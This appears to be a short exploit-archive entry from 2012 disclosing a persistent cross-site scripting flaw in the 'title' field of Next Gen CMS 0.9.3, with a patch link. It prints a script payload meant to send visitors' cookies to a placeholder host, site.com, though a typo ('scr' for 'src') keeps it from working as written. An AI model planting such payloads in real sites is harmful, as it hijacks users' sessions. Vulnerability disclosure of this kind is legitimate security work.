Next Gen CMS XSS Presistent Vulnerability



EKU-ID: 2069 CVE: OSVDB-ID:
Author: mix0x0 Published: 2012-05-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: [ACTIVE XSS] Next Gen CMS
# Author: mix0x0
# Vendor or Software Link: http://ngcms.ru/
# Version: 0.9.3 Release [SVN880+FIX01]

# Vulnerable to the field: "title", test blog*
# Exploit (test): <script>var t = new Image(); t.scr="http://site.com/cookie.php?"+document.cookie;</script>
# Patch: http://trac.assembla.com/ngcms/changeset/990